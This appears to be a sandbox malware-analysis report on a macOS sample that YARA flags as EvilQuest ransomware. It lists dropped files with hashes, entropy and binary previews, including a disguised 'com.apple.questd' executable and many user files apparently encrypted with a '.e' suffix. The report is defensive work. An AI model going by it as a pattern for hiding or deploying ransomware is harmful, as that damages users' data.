                                                                                                    Preview: ...8...>.Py...l....p.r.Ywu..}...:[...R$~UL)u?..T..O.b..U.....i...j.......9_...s6..ql...w3...T.X1z3X...L..8%....k.,2.........IeY4....l.4.........~p..8y7..!...P....)._E.j..w...X.UO..lo.../...L..v. ...M.(wL..5AI.[....dp.>.....V..4..3....jT.wIu....?.b..].z...,AvrA.J..*..y.x:......@..!c.|....a....nugJ...i..qj..._CN..|....?c2......xUL)u?..T...Ad...5..V~l.d3<...f..x...jdb.RZ.X+_..s..xb.H.|K?...s3......g+.0x....k.rV[..p/X....R.......8.......5.v.0p ...]G..,...R.T.h....I...j.$yr.O7.T.SS.`DAV..P...)>.`........M....7..pEo....^....c.S..M...P.fm....0..N.RV.....;|}.n.4oir#W..u.K.~A./Jo....P..Z.W.r.\....M.p.xNkv......&...........h....-..K..B...}.$.....n...Q(......)...H.....SK...+X.5X...7..C*.K.t.&........y..j.....d....JqV=....!Um.G.\.(.p.q9.-.&4...g..m.c.....IJh............g..._.h..\.p".Xt.B....c../TJ....u....h.J.............@]^..b}..$.u..N...r.....i....3...bp".W.'?...f...I.^...S."8}..UO.&y.\...cR::+.^..a...X..)cx.!*.a..Fe..;x.}v{P......^.(....R-...>NS......3.>&JE<B..t!.u.....~..z;.G....@..s{."j.Ne.,.
                                                                                                    /Users/ben/Desktop/Nt7gLoFlYn.dmg
                                                                                                    Process:/Library/mixednkey/toolroomd
                                                                                                    File Type:data
                                                                                                    Size (bytes):703938
                                                                                                    Entropy (8bit):7.99931614145264
                                                                                                    Encrypted:true
                                                                                                    MD5:A195CB59517A6EDEE3466CEBCF7B7BED
                                                                                                    SHA1:043912D63B83A88B35CE767E72332CA1ACC1ACBE
                                                                                                    SHA-256:F921145D5D16CC904C7CFBEED44FE642C21034DD6D07720FFD527ADA618ABF47
                                                                                                    SHA-512:C0881FBA2C4D66514A8226FC98C4797BFFB716E06C49FA4ED9D09B614D40B304820FC20455B065D2FD55771208854DFEE0F83FD90A78DC54F5D6643095A4A849
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: ma...S.i%.]=..B3.Y.7W...m....T7...)...P...I.F.y...X..{...rG.Uf.cQU$..}..`uH..+mE.4.s.:W..c.....6:M.N.4.}.......V.(....;..D_..............|..U:h...!g<..2..G..91......m..m4.k~...C...8........M....^......Q.~.m.}X..n#..Kd*......-..+...6T...]?.m6.).jT...O.].L.&Ui...3...[..#......u&.......y....Z...2..(...9...]_.......k=.....^;|.K2.....=0#...$r0|.....>R.f....(......3v....M....Tp.........#ff..s.B./..#^1xi..x5(y....A...a......T<.F..}..9P-Z.{.z....y.DZQ..#..bz..:.l...6X{.\...=,.).[.V.....m...]).d..N...~#1]*.k...CEj.l.q....8..l.Z..P..0&.{...3...O.'....... ......l..-..h.8B....)F.........'.J...Z.9..d..f...ca.......8.\8)..n....f.&w3.!'Z)...i.&.I......Z.n?......rb..U...i..............i.e8.....9...H.{....U.M'...^jg..........y.j.....1Li)...;..F..%.[<zd.Y...,..........6./.rr.Z...8y._d,r.C.,..N.uY..W.d...>...._Z!..#..J9ic$....%.......Q._...Tv.D1..U.k.%..........(...T....>,KM4....K...q.z.r.|......`g...f.k....RR}.K"ud2.;.5.C..\Rt.>.Ki...ca...2 h<G..^9Ol...,..2........U..j..<o!..x..9.J...........%..@,.x*.\w
                                                                                                    /Users/ben/Library/.O6a3uE2h3
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):175849
                                                                                                    Entropy (8bit):5.9041399023174925
                                                                                                    Encrypted:false
                                                                                                    MD5:A1D2D830FAD633638B0F6B20EF20A74B
                                                                                                    SHA1:11E526E23238A274B66B68F97F0F6F02168B8B98
                                                                                                    SHA-256:F2E59188AFC0FF0F82FAA8771CF89CF0D08023B0E289547C9BF48909F28FF03C
                                                                                                    SHA-512:8641E5AC3DDBFECC6035A4DBF29EB7EDE64076F5BAA32497AEEE10E5638A5749F8E6B7C54CD709D95F8DA806C9C5F003E09220ECD4E441B0CAA5942550391BA6
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/ben/Library/.O6a3uE2h3, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /Users/ben/Library/Accounts/.Accounts3.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.4185727093329112
                                                                                                    Encrypted:false
                                                                                                    MD5:7A0E2EEDB1CE973A5512CC3760E0B422
                                                                                                    SHA1:FED7963F6482F4EB2CCCCB9AAEC73A9C9320D27E
                                                                                                    SHA-256:F15075B2E3BAD0DF959E2941CDDEF1F5D8EC9EFA21167A298CD6F8485871B435
                                                                                                    SHA-512:6CCE672CA1E4FE3197332B99F1C1D51B2A03B51839CCE4BB28B9562379A6E76B5750082AFCA188DD999EFBCDEF22AB0203014F697E5FFA723F225072691CD3D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lm.......{.........WG..[...r.)..\|F......>.k....Lm.......{.........WG..[.......A%|F.......7.3.R.....!I.`..9.o..h$.........7.3.R..T..e.$Y..y.H.....g..gm,.E....N^..H.P...j..^...a...g.V.9.....*5C...lg)...|.....7Q9...d...d..~/.+.3.T+..E...T...u%:.s>../.3.:.2.y..........................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Accounts/.Accounts3.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Accounts/.Accounts3.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):147842
                                                                                                    Entropy (8bit):5.136627505052612
                                                                                                    Encrypted:false
                                                                                                    MD5:0D81F0B583663643F6121B39B0AF39C1
                                                                                                    SHA1:B6D6E52C9574857E1DE7030D43303FA7F4DCBB58
                                                                                                    SHA-256:9185F195935FF51D49C4450629D2E83D10E1C5A39002D207CF836E9C793DC34E
                                                                                                    SHA-512:B517DEDF52871EB50AB2EA9B659DEEE6356AC1528FD0EF441381980A37E9A4F6D477A8CD4FBFC1B08251B25F34CC219EA9B4D459B4D1F5E395B0B3A7D197C68E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........ty.DQ?W..........7..>..I[.[....%.t...7...t...7............L.D<.+.~.$O......k.t:.p......[..........nJ.....M.zoS[....m..GJ....w..............5z.Ndo.V..pu&T...T..F.t.....j.6.4..mq....k,.X.p.A....(.$y........y.w...o......w...0.."Ix`.R...S.0$.X.i".T.U.k..`uz4...|.:.=.?..;cP...gVp@X.L.K.Z.T..%q......$..o......w...0..".y..G...t.....j.6.4..mq.'.F.v........A...]...6`.cf..........Wl5. Eb...O.....:Z*;.....M?.C#..|.. ..Li...R.....................3l.h.\..,..se..........,..?M.t..f..Q..M........p.....1..................]..t..M.M...r....p..<.k9.B.S.0$.X.i....,..?.......b..6++.Q_.&%...K...........+O.V..=.q....oP.{|..}V@..h........-g..;...J......D.'.8nv...c<./2.,.....I.t...|.m..^kU.....2S...x.gq...k...C..j9..-j[..jq.5..Nd..)-.w.L........s._....+.....Y5h./.Ng..{.m..^kU.....2S..J.z%...N..b..x.4;...J...Ju.e...'_O7t.9.....R?..........9.7.X.. ...#....0.p..u.k.;...k.x.A.p....S)...qq.W...WtL......m..C....nc........C..^.m.^<..H+^....~s)..r....K..]....._Lf?..........!.Lk.U.....?.....1.@...
                                                                                                    /Users/ben/Library/Accounts/.Accounts4.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3831100463429324
                                                                                                    Encrypted:false
                                                                                                    MD5:2893CEEB79288E0703C1D177E10DF7FF
                                                                                                    SHA1:9824A10871B6E09E170B692D8D89EFBA09A1C8B7
                                                                                                    SHA-256:A3BBCA75AE4C0B3BCD38473A4C7ECD936C1752600A5FBDD677FA398F73E92A56
                                                                                                    SHA-512:0ADE073EB41EFEB4223765ED5D011E267927C76F6DB10F12417F5C1CE5FFCE64C529BFAD0F7AE94662618CDDCE538DFE65F53C708928A5D300A808881F208824
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lm.......-.R..;........-...B.p.X.6.....v.>.k....Lm.......-.R..;........-..;M.v.\_6.....v.........n.....<..9.o..h$........V.;E........_4._..(%..z7Kp..x.*X.....Cj...&..@.....0.`6...g.V.9..>._..F*y......R...a}............................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Accounts/.Accounts4.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):82791
                                                                                                    Entropy (8bit):5.442662740505335
                                                                                                    Encrypted:false
                                                                                                    MD5:6772E583E63D67AC3DB398B1D5470BC3
                                                                                                    SHA1:ACB593F8BF0DDD00C730780E490465846FC7A880
                                                                                                    SHA-256:12D15A077FEAF1CE415DE3A4BDB082D1EA7E788ECE3A4316266F8B28BFED6A40
                                                                                                    SHA-512:A6E85B8449B13317F4785668E31EEABA9B2EBAD5DD89E0B8EC0A3113C3F9C44F3B5C769D6C3362818D2E2EA4F5AEBFAF54A75774F9945E3D971B7795BA58C3CB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.....B.p.X......./.t...7.....B.p.X.6N.y .1..#.1rS..a....lT........t...{.DU..............M...[....%.t...7...t...7...................~........D.k...q".^.Q .*.........nJ.....M.zoS[....m..GJ....w..............5z.Ndo.V..pu&T...T..F.t.....j.6.4..mq....k,.X.p.A....(.$y........y.w...o......w...0.."Ix`.R...S.0$.X.i".T.U.k..`uz4...I...R....;cP...gVp@X.L.K.Z.T..%q......$..o......w...0.."..R(t..ct.....j.6.4..mq.'.F.v........A...]...6`.cf..........Wl5. Eb...O.....:Z*;.....M?.C#..|.. ..Li...R.....................3l.h.\..,..se..........,..?M.t..f..Q..M........p.....1..................].....}.....r....p..<.k9.B.S.0$.X.i....,..?.......b..6++.Q_Nb.p.z,v..........+O.V..=.q....oP.{|..}V@..h........-g..;...J......D.'.8nv...c<./2.,.....I.t...|.m..^kU.....2S...x.gq...k...C..j9..-j[..jq.5..Nd..)-.w.L........s._....+.....Y5h./.Ng..{.m..^kU.....2S.....D......b..x.4;...J...Ju.e...'_O7t.9.....R?..........9Zu..4.o{..#....0.p..u.k.;...k.x.A.p....S)...qq.W...WtL......m..C....nc........C..^.m.^<..H+^....
                                                                                                    /Users/ben/Library/Accounts/.Accounts4.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):151947
                                                                                                    Entropy (8bit):5.1707489850526915
                                                                                                    Encrypted:false
                                                                                                    MD5:EC7BD6994B11A0DA92A3BB0F4E38090B
                                                                                                    SHA1:487F79077D9F9E564B18F0FD9BA03347B7AC5FD5
                                                                                                    SHA-256:C95F095EDF80C7FD0FDFA67172574203030913AAA9EA6D2D54721D366163F6A5
                                                                                                    SHA-512:020A575A29A70DBA48BD59A2819C592A426E53B9D9A9EF29936ED5FF32A36E449DB084825FB46E109AF585178345F88F67E620CFF2B432A9B6BDB030B7F83E5A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t.E.....|.............M...[....%.t...7...t...7............L.D<.+........p.D.k...q".^.Q .*.........nJ.....M.zoS[....m..GJ....w..............5z.Ndo.V..pu&T...T..F.t.....j.6.4..mq....k,.X.p.A....(.$y........y.w...o......w...0.."Ix`.R...S.0$.X.i".T.U.k..`uz4...|.:.=.?..;cP...gVp@X.L.K.Z.T..%q......$..o......w...0..".y..G...t.....j.6.4..mq.'.F.v........A...]...6`.cf..........Wl5. Eb...O.....:Z*;.....M?.C#..|.. ..Li...R.....................3l.h.\..,..se..........,..?M.t..f..Q..M........p.....1..................]..t..M.M...r....p..<.k9.B.S.0$.X.i....,..?.......b..6++.Q_.&%...K...........+O.V..=.q....oP.{|..}V@..h........-g..;...J......D.'.8nv...c<./2.,.....I.t...|.m..^kU.....2S...x.gq...k...C..j9..-j[..jq.5..Nd..)-.w.L........s._....+.....Y5h./.Ng..{.m..^kU.....2S..J.z%...N..b..x.4;...J...Ju.e...'_O7t.9.....R?..........9.7.X.. ...#....0.p..u.k.;...k.x.A.p....S)...qq.W...WtL......m..C....nc........C..^.m.^<..H+^....~s)..r....K..]....._Lf?..........!.Lk.U.....?.....1.@...
                                                                                                    /Users/ben/Library/AppQuest/com.apple.questd
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):175849
                                                                                                    Entropy (8bit):5.9041399023174925
                                                                                                    Encrypted:false
                                                                                                    MD5:A1D2D830FAD633638B0F6B20EF20A74B
                                                                                                    SHA1:11E526E23238A274B66B68F97F0F6F02168B8B98
                                                                                                    SHA-256:F2E59188AFC0FF0F82FAA8771CF89CF0D08023B0E289547C9BF48909F28FF03C
                                                                                                    SHA-512:8641E5AC3DDBFECC6035A4DBF29EB7EDE64076F5BAA32497AEEE10E5638A5749F8E6B7C54CD709D95F8DA806C9C5F003E09220ECD4E441B0CAA5942550391BA6
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/ben/Library/AppQuest/com.apple.questd, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/ben/Library/AppQuest/com.apple.questd, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /Users/ben/Library/Application Support/Adobe/Acrobat/DC/.IconCacheRdr65536.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):180548
                                                                                                    Entropy (8bit):6.44647994452846
                                                                                                    Encrypted:false
                                                                                                    MD5:555C21E180333E185AB2E59D12BB93CC
                                                                                                    SHA1:68FD263E018A0F23CF5219836FCAA3DE7ABAD710
                                                                                                    SHA-256:5473132301AE4D4E9FE052EAAFB244B250D4F0669FE38E0CA93DA8744ED5CF7E
                                                                                                    SHA-512:4064FC6C65BD73B0DFF647BFD28C1EA16A2524B38881C7D3CC921091FF164480F89FCFA6BC534BC61E98BBB819AB14ED6F7A817346F53A399A4890BDE93931F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: DL-...C..0..w....?Zr^..Ec.c.u.......P9.?.Fg.t...L.e.k...mE..d*......I.Ua.........L.D<.+..........................................................................................................................................................................................................................................................L.D<.+....................Dd.R.........?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U..$X.r..K...................Dd.R.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.?..6..U.Y?.x.a.....................Dd.R.Y?.x.a...........................L.D<.+....................Dd.R.Y?.x.a.....................Dd.R.Y?.x.a.....................................................Dd.R.Y?.x.a.....................Dd.R.Y?.x.a.....................................................Dd.R.Y?.x.a.....................Dd.R....@R......................................................Dd.R.Y?.x.a.....................Dd.R.Y?.x.a..................................................
                                                                                                    /Users/ben/Library/Application Support/Adobe/Acrobat/DC/Security/CRLCache/.0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):946
                                                                                                    Entropy (8bit):7.117907021421612
                                                                                                    Encrypted:false
                                                                                                    MD5:8ABD5E932B82C663301CEF5902EDCBA3
                                                                                                    SHA1:1A1DBF4D705600C3126A622DED192AF3E0E4810B
                                                                                                    SHA-256:71B3BDF22574AEF43B5D1D239A0E61DCED2026034126ACB8B9840BC3722D0682
                                                                                                    SHA-512:5C946845378239AC19ACDCD37D760BFD5E0BFFE0113BE4B92D5EE2FD85EEBB3FDDA07A3B0F807C72EB48A1F008484C65325481D1953105C46E5AD7D68BF227FD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ~.2..#,n.\..9.{..Q.&T|B.G.X..z..{g....+...,..m.5[.n....M..-............\.g.N.....'.5..-.....+!.o..N..|'(`{7..g.)....W...9.v..2t....D&S.~6...E..$7[......].X......a..N........U......T}.E...............B..0..*.>\.!K..s.N.)Y.[!W..........P..A..........osY.dz.!..}...r."&.......P..MV...P.mT...G]-v:+).U.a..._=Y.y..$?.rv|gn.....]...;L..K|.............J jC|.%..S..f.1K.3/^..>.;%.._<8...g#......O#_.o(.....s.........Mb..s....,...."4.I.......o.E..$vV.MQQRa!R.w#................m.W.'....T../.x..d>v...(r.......>7(...Cuv.b.--,.eAm..*.......M.fY.iW....E.F.......Hn...*_L{bt...k.>yW.J...K3U6C....Q..(..$.%.. . ...\..3:Y.wl.......(ZV......h>..'.......9.'..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/Adobe/Acrobat/DC/Security/CRLCache/.CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):738
                                                                                                    Entropy (8bit):6.760329304193865
                                                                                                    Encrypted:false
                                                                                                    MD5:07A32EAD83529731E9A5C14D91235DFD
                                                                                                    SHA1:1C868C63F5B1729247114E663CEBA1A0C01773A0
                                                                                                    SHA-256:DDB210629E2DA2EE03A86DCAE1475CCB72844A53850E5C7D048BBD199E9DBE25
                                                                                                    SHA-512:30B91D9FE3C3752F6A2B5D24EABC6E7845604CD9D15DD8C9ECDD84267C8A78C787900E66E1F183B8D7464529F3F50455471DFB3F0845FFACBDB39EF92F28844E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#...Z........r.v..r.HQJ....F...r`.j.t...........&.^..K.n./...z.....?.<]J*y.H....z ....7.+....L....+.,....N...u...}T.o.O.....Tg.l.#Xd..:Wat'"Y..*{.hp7|.F.H.~.&m.......Rt..f..e...'.9O"5.f...26.zVZT....UK.U.'.,}.....2.{)8&...:...9#jj~.(SA. j)..0m~.....j^(.Q...4S>...j....x...*?............P..h.Tht.k..qo2G.....~.F..D...e....X/C.k..u0.z....T.. .X.x.'.'f.;.....IRY.*..Ww.:'....Wa.k..N..r.........m...d8).c.....b.<".......>............b...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/CallHistoryDB/.com.apple.callhistory.databaseInfo.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.13916721866629
                                                                                                    Encrypted:false
                                                                                                    MD5:7B48039421415374A7FF3B6F2D8C5AFC
                                                                                                    SHA1:08FBE17BFE41A5CAFC0113CC6D9245E1DB778044
                                                                                                    SHA-256:1593C84A4BE8F63335BFCA0BA9153711372F556FEEE146441418C91EF7D83AF1
                                                                                                    SHA-512:2AF9466BD33B14E7236A980D419958C97BA8D74E814EE32FFF1E830C256EEF41D285B4FF5FCFE4688359BABA7381259DD84FF2DFD60B52AFFFF921B97623BD35
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.......X...0..x.M.r}.U .7..G&.JF~.M...<...U.....?...a.,...GA...B._d...(.....<....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/JREInstaller/.JREInstallLog.txt.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5434
                                                                                                    Entropy (8bit):7.872587212169236
                                                                                                    Encrypted:false
                                                                                                    MD5:67C88E273A4ABCC7CBC1091B7290FD43
                                                                                                    SHA1:CC14160D2643D890CA8AE57384392BC1C4861997
                                                                                                    SHA-256:D10B2D12A36B8378309C96C7F30C4A877D145420D308AA8C0A928EEEB98AAAA9
                                                                                                    SHA-512:BA82C863BF00C25A4FB1A923862055EA9C7DF73D9640FB4F4146BD6E7414257C30951212BC3E4C4A2A1FBBD0AA77C375616C1BC696EFB3463FED021880917EF6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: f._M.... F.@d...I8..<2t.. hL..P...5y..0..^...`..S.`m24^51,.?E5..h...i.....@.+...U7.8.[h...4..t...H._...L../..MW.G.A..:../..\.R[.%.E.h{7...W.]p.....%....+.y..S..N+.......X.dn....h.-.w..L...Z....p..t..F.M.VR~Z...g.....T...5.y2S.`m24^51,.?E5..h...i.....@.+...?.....w...4..t..&.p.....n..MC..P?8.p=.. W.F......*.....f.c..p0.:......r..3.q...X.]eW[..)y|K...5b?1Oy....V.;7..g>...+.."...3a.dVo.:8.&...{..v.N..g..dq...j.{........i.D,[.J..'"<.-...f...<E.(.#.!..................,....T.\F.m.Z............@............d.....Ar.Z......LO.##..............L........@..<{..k.J.W.SU\".....4/..........T.`)c...$..A.0.F....=tW..9.S..5...9.B.q.C..(.`..$Z@...C...........d.....Ar.p....o#.;r...........n...x.2.2.w#~.B..].b....A...h..x..Q..7X.k.7"..........@..<{..k.J.WL|..%.%......EKf..Yx..Y.T.r.}...5f..c5.QXT2g...!..am...a.\F.m.Z............@............d.....Ar.......U.$.. x..x+.Z/.t.....vd>.!.....3.....-0.".SxB.z..Dk.p.g....Yx..Y.T.r.}...$idi..A...{....G............Zw..S..,.C..[...........{f...N.6.2...8.Wh...0t....}Y
                                                                                                    /Users/ben/Library/Application Support/Oracle/Java/Deployment/cache/security/.blacklist.cache.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8506
                                                                                                    Entropy (8bit):6.570973542628075
                                                                                                    Encrypted:false
                                                                                                    MD5:83020900F2049C3E5D03F821E76D7FB2
                                                                                                    SHA1:B419DDF3CF8DA2B6D9BE7EEB5ECFF42D791DC2C9
                                                                                                    SHA-256:06F466913C778F61B24DD2CDC6E76CD44C47E7A9F734DA922922261635C6994E
                                                                                                    SHA-512:68D3016B4C2B95FF2A13F2A2B4A6F5EE0515508E0B1BEDC3A228F5C23D1ADDCD150FB588E72B22747191E107CA73CE36869E55BC27897EB71E0E5FA6948F24E3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .DP...:.d!./...{...........R....%R4,..............k 0.4.................,.....%1]1..a.g..........-P.K..Q................!..x4g......................................U0.............,1...uP...+!.........Z..=...B........................Tr|.......%....+........z=..yi.=3....S*..`...=P*.,..............1F+.J...........P...]..?..?g=y...i.Z.......i.......................\..|o..}...g.....................G._..................................1..........................T%...........-P.K..Q........8.19Hc...e...w}..........l..f....9..P...J...u..X.=7.%T\2........#......L..........%....+.................L.D<.+.......................{.z=..yi.={...#Rox...........'..f....................\..|o........................d!./...{~.F...^...........C.3..z............\...P...]..?...................4..5S.}..5!..A.t.....%R4,............uP...+!.........i......Y.........L.D<.+.&..?.c+..........-...."6............|.. X.+..%.u........P...]..?........6~Fe.......W............{...#Rox...........\..|o.HD...X...........w....3
                                                                                                    /Users/ben/Library/Application Support/Oracle/Java/Deployment/security/.blacklisted.certs.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1586
                                                                                                    Entropy (8bit):7.540437193319532
                                                                                                    Encrypted:false
                                                                                                    MD5:8AB1122ABA417911D624EBB2A38942BD
                                                                                                    SHA1:32969C0F655DE6301CE8DFDF4DFE6C25601D7308
                                                                                                    SHA-256:D5D16D31A27A1CB77313B00884FFAC2EDE8EAA7895045CF67CA741C78614AB13
                                                                                                    SHA-512:7986936E1428C37D91CB463A6CA68ED1E6860CE7AD810AB0C8470E0D6BA17F13E085FD8A6FF803489FCDACF7529A6329C93A0EC6310CC0CE44837F1451AA00BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...........n....~.c.)\.....)7@.....Nv...#tC.[.XQ....:6.8^./......5Fbx.....).-...I.]...E.....q.].V..FcgP&...m...._.u...)..A..w...R.".|7.....!...*E.@....9N{.Wy.g........7.9..|....FN...A..m..q.m..G..>5......6...._}........z.....&...8..V..^.`.f.../;h.@..~...O...{.T.U.RI.{..-..I....%...r..N.._7wu..9.....'.7{.$r.a.w.......1)...................]....f.*..R#w.u..'l.a.P..K.Ff@dl.l.T).{...$.}..U.'e_s..I3....r?/j)H.....X.......9.E..YNvW..Q...|:....].....3N..s..\.|A."......z.D%.....oT..t../....t...ml.Q..j....j.........9;+..~.......j...#}.X......d=.w2%.!G..(NJf.`..x....`.H._!....>..7.v.*.].an.2....h.@......R.;gc..r..^...K.g.....U)...*.....$..2.]..a...pfR,>.....<..5.T:.l.Hz.u..B.{.B...Ag..).@..q.N?".!.A...^...e..n.H..@v.....I>W..mJ1.v..Q...;...B..M...F..5...".z..;.....n>'....w.\.....`.........X.........}F.Xi/$..V.B.Vx<.v..=gfU..w.Gk...........UV...dR.e..p.,.)+...e....%%....[..g3..<.`..hD.L......@.G................UF......L.s...;&...R........9.+..1...Y..d;0d......)rl.2..~\.=g..B_........x...AN!....y..
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.cloudphotosd.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.8121339428462795
                                                                                                    Encrypted:false
                                                                                                    MD5:205184C901FCC152ABCE44E9C62DA1CA
                                                                                                    SHA1:FC05D067FAEA1A9AB8543E52FFE0BBFB41CD64E8
                                                                                                    SHA-256:59425474DE94ABBB369549427E97654B1C3F40FD84F79AC99EC49B7EE384AA3C
                                                                                                    SHA-512:98523D4C40D0E66E462882A78BD9F08CB6B27D8ECED500584DFC396BE605F615F4EDE23645FB710448CF0221D01A201395BA71BA1A26CA836B79156B0668E617
                                                                                                    Malicious:false
                                                                                                    Reputation:low
